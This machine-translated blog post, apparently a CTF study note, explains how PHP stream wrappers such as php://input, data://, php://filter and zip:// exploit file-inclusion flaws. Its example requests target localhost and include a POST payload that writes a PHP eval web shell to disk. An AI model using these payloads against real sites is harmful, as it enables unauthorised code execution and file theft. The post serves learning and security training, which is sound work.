当前位置:网站首页>PHP pseudo protocol for command execution
PHP pseudo protocol for command execution
2022-07-19 02:37:00 【jjj34】
Reference link :PHP Pseudo protocol summary - SegmentFault Think no
Catalog
4.zip:// & bzip:// & zlib:// agreement
1.file:// agreement
Conditions :
allow_url_fopen : off/on
allow_url_include: off/oneffect :
Used to access the local file system , stay ctf Is usually used to read local files
stay include() / require() / include_once() / require_once() The parameters are controllable , Even if import is not .php file , Such as shell.txt , Still, in accordance with the php Grammar for parsing , This is a include() Function
explain :
file:// The file system is php Default encapsulation protocol used , Used to show the local file system .
usage
/path/to/file.ext
relative/path/to/file.ext
fileInCwd.ext
C:/path/to/winfile.ext
C:\path\to\winfile.ext
\\smbserver\share\path\to\winfile.ext
file:///path/to/file.extExample :
1.file://[ The absolute path and filename of the file ]
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt2.file://[ Relative path and file name of the file ]
http://127.0.0.1/include.php?file=./phpinfo.txt3.http:// Network location and file name
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt2.php:// agreement
Conditions
allow_url_open : off/on
allow_url_include: only php://input php://stdin php://memory php://temp need oneffect :
php:// Access individual inputs / Output stream (I/O streams), stay ctf Often used in php://filter and php://input
php://filter For reading source code
php://input Used to perform php Code explain
php Some miscellaneous inputs are provided / Output (IO) flow , allow access to PHP Of I / O stream , Standard I / O streams and error descriptors
php://filter Use
php://filter/read=convert.base64-encode/resource=[ file name ]php://input Use
http://127.0.0.1/include.php?file=php://input
[POST DATA part ]
<?php phpinfo(); ?>Write a word Trojan
http://127.0.0.1/include.php?file=php://input
[POST DATA part ]
<?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>3.data:// agreement
effect :
php>=5.2.0 , have access to data:// Data flow wrapper , To transfer data in the corresponding format . Usually used to perform php Code
usage
data://text/plain, ???
Such as
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>4.zip:// & bzip:// & zlib:// agreement
effect :
zip:// & bzip:// & zlib:// All belong to compressed flow , You can access sub files in a compressed file , More importantly, you don't need to specify a suffix , It can be modified to any suffix , Such as jpg,png,gif,xxx etc.
Example :
1.zip://[ Compressed file absolute path ]%23[ The name of the sub file in the compressed file ](# The code of is %23)
Compress phpinfo.txt by phpinfo.zip , Rename the package to phpinfo.jpg , And upload
http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt2.compress.bzip2://file.bz2
Compress phpinfo.txt by phpinfo.bz2 And upload ( Any suffix is also supported )
http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz23.compress.zlib://file.gz
Compress phpinfo.txt by phpinfo.gz And upload ( Supports any suffix )
http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gzsummary
stay ctf The most common ones in English are data:// , php://input , php://filter ,file://
php://input ,data:// To execute commands
1.php://input Usage of
http://127.0.0.1/include.php?file=php://input
[POST DATA part ]
<?php phpinfo(); ?>
2.data:// usage
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
php://filter,file:// Used to read files
3.php://filter usage
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php( Read php The file needs to be encrypted before it can be read out )
http://127.0.0.1/include.php?file=php://filter/resource=/flag
4.file:// usage
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt边栏推荐
猜你喜欢
随机推荐
2022.6.28-database-1 Isolation level of database
脏读、幻读、不可重复读
Sword finger offer 53 - I. find the number I in the sorted array
性能测试实施规范指南
并发虚拟用户、RPS、TPS的解读
元宇宙公链Caduceus项目详解(一):Caduceus Metaverse Protocol的项目理念及技术框架
SSTI模板注入
If a hunter shoots a rabbit with a gun
BeanShell脚本获取当前时间
Dirty reading, unreal reading, non repeatable reading
The solution to the bounce and offset of unity3d game characters when jumping to the ground
攻防世界----shrine
3D NFT的破茧重生:Caduceus去中心化边缘渲染技术
Attack and defense the world ---- shrink
Detailed explanation of caduceus project of metauniverse public chain (I): project concept and technical framework of caduceus metaverse protocol
Method of JMeter connecting to database
Performance test implementation specification Guide
SSTI模板注入
转载:SQL注入常见绕过
西加加